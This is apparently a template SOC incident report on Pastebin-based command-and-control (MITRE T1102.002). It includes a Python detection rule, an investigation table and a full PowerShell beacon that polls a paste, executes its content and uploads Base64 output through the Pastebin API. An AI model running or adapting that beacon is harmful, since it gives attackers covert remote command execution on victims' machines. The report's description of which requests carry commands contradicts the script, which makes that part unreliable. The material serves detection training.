T1102 – Web Service (Zscaler Detection)

Zscaler Alert Details
Alert ID: ZSCALER-WEB-SERVICE-1102-7842
Alert Time: 2024-03-01 14:15:33 EST
Severity: HIGH (85/100)
Source: Zscaler Internet Access (ZIA)
Rule: "C2 Communication via Legitimate Web Service – Pastebin"
MITRE ATT&CK: T1102.002 – Web Service: Bidirectional Communication

Alert Details:

Detection: Internal host communicating with Pastebin in anomalous pattern

User: alexchen@company.com (Alex Chen, Engineer)
Source IP: 192.168.45.78 (ENG-WS-045)
Destination: https://pastebin.com/api/api_post.php
Time: 14:00-14:15 EST

API Calls:

14:00:22 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=whoami”)
14:02:45 – GET from /raw/AbCdEfGh (response: “user=engineering\alexchen”)
14:05:12 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=dir C:”)
14:07:38 – GET from /raw/XyZ12345 (response: directory listing)
14:10:15 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=exit”)
14:12:30 – GET from /raw/AbCdEfGh (response: “ok”)

Detection Logic:

Pastebin is a legitimate service (commonly used for code sharing)
Unusual pattern: alternating POST then GET cycles (command sent, response retrieved)
Content contains system commands (whoami, dir)
User alexchen has no history of using Pastebin for work
Pattern matches C2 over a legitimate web service
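The detection logic above can be expressed as a log-correlation rule. The following is an added example (not Zscaler's rule or the page's code) that walks a constructed, simplified proxy log, pairs each command-bearing POST to api_post.php with the next GET /raw/ from the same host, and flags hosts that show repeated cycles while skipping users with an approved Pastebin history. The log field layout and the known-user allowlist are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines modelled on the alert above (not real Zscaler output).
# Fields: date time src_ip user method host path body
SAMPLE_LOG = """\
2024-03-01 14:00:22 192.168.45.78 alexchen POST pastebin.com /api/api_post.php session=7a8b9c0d&cmd=whoami
2024-03-01 14:02:45 192.168.45.78 alexchen GET pastebin.com /raw/AbCdEfGh -
2024-03-01 14:05:12 192.168.45.78 alexchen POST pastebin.com /api/api_post.php session=7a8b9c0d&cmd=dir%20C:
2024-03-01 14:07:38 192.168.45.78 alexchen GET pastebin.com /raw/XyZ12345 -
2024-03-01 14:09:01 192.168.45.90 bsmith GET pastebin.com /raw/Qq11Ww22 -
2024-03-01 14:10:15 192.168.45.78 alexchen POST pastebin.com /api/api_post.php session=7a8b9c0d&cmd=exit
"""

# System commands named in the alert; extend for your environment.
CMD_PATTERN = re.compile(r"cmd=(whoami|dir|ipconfig|netstat|exit)\b", re.IGNORECASE)
MAX_GAP_SECONDS = 300   # a GET /raw/ within 5 minutes of the POST counts as one cycle
MIN_CYCLES = 2          # alert once a host shows repeated command/response cycles


def parse_line(line):
    """Split one constructed log line into its fields (assumed layout)."""
    date, time, src, user, method, host, path, body = line.split(" ", 7)
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return {"ts": ts, "src": src, "user": user, "method": method,
            "host": host, "path": path, "body": body}


def detect_pastebin_c2(log_text, known_pastebin_users=frozenset()):
    """Return {src_ip: cycle_count} for hosts showing POST-api / GET-raw command cycles."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    pending = {}                 # src_ip -> timestamp of last command POST awaiting a GET /raw/
    cycles = defaultdict(int)
    for e in events:
        if e["host"] != "pastebin.com" or e["user"] in known_pastebin_users:
            continue             # out of scope, or a user with an approved Pastebin history
        if e["method"] == "POST" and e["path"].startswith("/api/api_post.php") \
                and CMD_PATTERN.search(e["body"]):
            pending[e["src"]] = e["ts"]
        elif e["method"] == "GET" and e["path"].startswith("/raw/") and e["src"] in pending:
            if (e["ts"] - pending.pop(e["src"])).total_seconds() <= MAX_GAP_SECONDS:
                cycles[e["src"]] += 1
    return {src: n for src, n in cycles.items() if n >= MIN_CYCLES}
```

Run against the sample, ENG-WS-045 (192.168.45.78) is reported with two complete cycles; the unrelated single GET from 192.168.45.90 is not.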

Threat Intelligence:

Pastebin is abused by multiple malware families for C2
Commands are encoded in API calls
Responses are stored as raw pastes

SOC Investigation Process

Step | Action | Tools Used | Findings
1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed Pastebin C2 pattern
2. Process Investigation | Identify process on endpoint | CrowdStrike Falcon | powershell.exe making Pastebin API calls
3. Script Analysis | Extract PowerShell script | CrowdStrike Live Response | Script using Pastebin for C2 communication
4. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined
5. C2 Blocking | Block Pastebin API access | Zscaler, Palo Alto | Pastebin API restricted (allowlist only)
6. Malware Removal | Clean infected host | CrowdStrike Live Response | PowerShell script removed; host reimaged

Jira Incident Report
Ticket: SOC-2024-152
Summary: T1102 – C2 Communication via Pastebin API
Status: RESOLVED
Resolution: MALICIOUS – C2 Channel Disrupted
Priority: P2 – MEDIUM
Labels: T1102, web-service, pastebin, c2, zscaler, compromised-account
Components: Network-Security, Endpoint-Security

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Zscaler Internet Access.
Alert: “C2 Communication via Legitimate Web Service – Pastebin”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Service: Pastebin API.
Time: 2024-03-01 14:15 EST.
Technique: MITRE ATT&CK T1102.002 – Web Service: Bidirectional Communication.

2. Technical Analysis:

Attack Chain:

13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker deploys PowerShell script using Pastebin for C2
14:00-14:12 – C2 communication via Pastebin API
14:15 – Zscaler detects

C2 Mechanism:

POST to API: Send commands to C2 (encoded in paste content)
GET from raw: Retrieve command responses
Paste IDs: Generated dynamically (AbCdEfGh, XyZ12345)
Frequency: Commands every 2-3 minutes

PowerShell Script (as extracted from the host; analyst comments added):

    $c2 = "https://pastebin.com/api/api_post.php"
    $api_key = "your_api_key_here"

    while ($true) {
        # Poll the fixed raw paste for a new command
        $cmd_paste = Invoke-RestMethod -Uri "https://pastebin.com/raw/AbCdEfGh"

        if ($cmd_paste -ne $last_cmd) {
            # Run whatever the paste contains and capture stdout/stderr as one string
            $result = Invoke-Expression $cmd_paste 2>&1 | Out-String

            # Base64-encode the output and publish it as a new unlisted paste
            $encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($result))
            $body = @{
                api_option        = "paste"
                api_user_key      = ""
                api_paste_private = "2"
                api_paste_name    = "response"
                api_paste_code    = $encoded
                api_dev_key       = $api_key
            }
            Invoke-RestMethod -Uri $c2 -Method POST -Body $body

            $last_cmd = $cmd_paste
        }

        # Beacon interval of two minutes, matching the 2-3 minute cadence seen in the proxy log
        Start-Sleep -Seconds 120
    }

Commands Executed:

whoami (discovered user)
dir C:\ (listed files)
ipconfig (network info)
netstat (connections)
exit (terminated)

3. Investigation Findings:

Timeline:

13:30 – Account compromised
13:45 – Attacker logs in
13:50 – Script deployed
14:00-14:12 – C2 communication
14:15 – Zscaler alert
14:17 – SOC investigates
14:18 – Host isolated
14:20 – Pastebin API blocked

Indicators of Compromise (IoCs):

Network:
– Pastebin API (api_post.php)
– Paste IDs: AbCdEfGh, XyZ12345 (now expired)

Host:
– C:\Users\alexchen\c2.ps1 (SHA256: a1b2c3d4…)

Account:
– alexchen (compromised)

4. Containment Actions:

Immediate Actions:

Isolated ENG-WS-045 via CrowdStrike.
Blocked Pastebin API access via Zscaler (allowlist only).
Deleted PowerShell script.
Disabled alexchen account.
Reset password.

Host Remediation:

Reimaged host.

User Remediation:

MFA enforced.

5. Root Cause Analysis:

Primary Cause: User account compromised, leading to malware deployment using legitimate web service.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Pastebin allowed (abused for C2).

6. Business Impact:

Operational Impact: Engineering host offline for 2 hours.
Data Exposure: System information only (no sensitive data).

7. Remediation & Prevention:

Completed Actions:

C2 channel disrupted.
Malware removed.
Account secured.

Technical Controls Enhanced:

Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted Pastebin API to approved users only.
Enhanced monitoring for web service abuse.

8. Conclusion:

An attacker used a compromised engineering account to deploy a PowerShell script that used the Pastebin API for C2 communication, evading detection by hiding in traffic to a legitimate service. Zscaler detected the anomalous POST/GET pattern and enabled rapid containment.

Closure Rationale: C2 disrupted; malware removed; account secured.

Analyst: [Your Name], SOC Analyst
Date: 2024-03-01 15:30 EST
